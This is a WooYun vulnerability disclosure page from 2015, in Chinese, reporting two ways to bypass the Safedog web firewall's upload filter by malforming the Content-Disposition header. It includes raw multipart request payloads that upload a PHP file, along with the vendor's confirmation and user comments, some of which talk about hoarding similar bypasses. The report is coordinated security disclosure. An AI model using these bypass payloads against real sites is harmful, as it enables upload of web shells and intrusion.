当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136073

漏洞标题:网站安全狗上传拦截bypass(两种姿势)

相关厂商:安全狗

漏洞作者: JoyChou

提交时间:2015-08-22 15:26

修复时间:2015-11-22 09:02

公开时间:2015-11-22 09:02

漏洞类型:设计错误/逻辑缺陷

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-22: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经确认,细节仅向厂商公开
2015-08-27: 细节向第三方安全合作伙伴开放
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

在第一弹中,我们可以通过大小写进行bypass。
那第二弹呢?

详细说明:

姿势一、
大家还记得之前在zone上,有人将form-data改为f+orm-data进行绕过的case吗?
所以google下Content-Disposition的value,发现有很多,每个都能上传成功,并且绕过。
http://www.iana.org/assignments/cont-disp/cont-disp.xhtml#cont-disp-1
最后,发现原来Content-Disposition的值可以为空。最后知道真相的我眼泪掉下来。

------WebKitFormBoundarysnXY4rAshTKCPSr1
Content-Disposition: name="file"; filename="bypass.php"
Content-Type: application/octet-stream
<?php  
echo 'bypass safedog upload ';
?>
------WebKitFormBoundarysnXY4rAshTKCPSr1


姿势二、
在Content-Disposition:后添加多个空格 或者
在form-data;后添加多个空格

------WebKitFormBoundarysnXY4rAshTKCPSr1
Content-Disposition: form-data;   name="file"; filename="bypass.php"
Content-Type: application/octet-stream
<?php  
echo 'bypass safedog upload ';
?>
------WebKitFormBoundarysnXY4rAshTKCPSr1

漏洞证明:

4.png


5.png


6.png


修复方案:

考虑综上情况

版权声明:转载请注明来源 JoyChou@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-08-24 09:01

厂商回复:

恩,没错,您的测试方向是对的,不过这个问题我们之前就已经知悉,将尽快进行修复。
然后也很感谢您的提交。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-27 10:40 | Snow陈伦 ( 路人 | Rank:6 漏洞数:2 | 闷骚的家伙,何处都是你的战场。)

    看了很多站普及度很高的都是安全dog,我等ITDOG无法直视。

  2. 2015-08-27 10:49 | agnes ( 路人 | Rank:5 漏洞数:2 | 啊,啊)

    为了1rank,值吗

  3. 2015-08-27 18:50 | qdq ( 路人 | Rank:2 漏洞数:1 | 有关部门)

    提交一个少一个,何必呢?

  4. 2015-08-27 22:00 | Linv2 ( 路人 | Rank:2 漏洞数:1 | Null)

    我手里有个安全狗iis版上传的,舍不得曝啊

  5. 2015-08-27 22:08 | wy007 ( 普通白帽子 | Rank:108 漏洞数:11 | 其实我是一名卧底...)

    @Linv2 现在你可以虐安全狗,报出来之后你就要被虐了

  6. 2015-08-28 17:23 | sco4x0 ( 实习白帽子 | Rank:31 漏洞数:13 | O_o)

    跪舔jc老湿

  7. 2015-08-29 16:03 | huoji ( 实习白帽子 | Rank:41 漏洞数:10 | 目标是当个农民)

    早知道 我就提交了一直留着为自己用 没想到被别人提交了

  8. 2015-09-01 15:18 | 兔小白 ( 实习白帽子 | Rank:31 漏洞数:3 | 搜片就到 www.sougaoqing.com)

    他们知道为什么不补?有人报了在处理?想不明白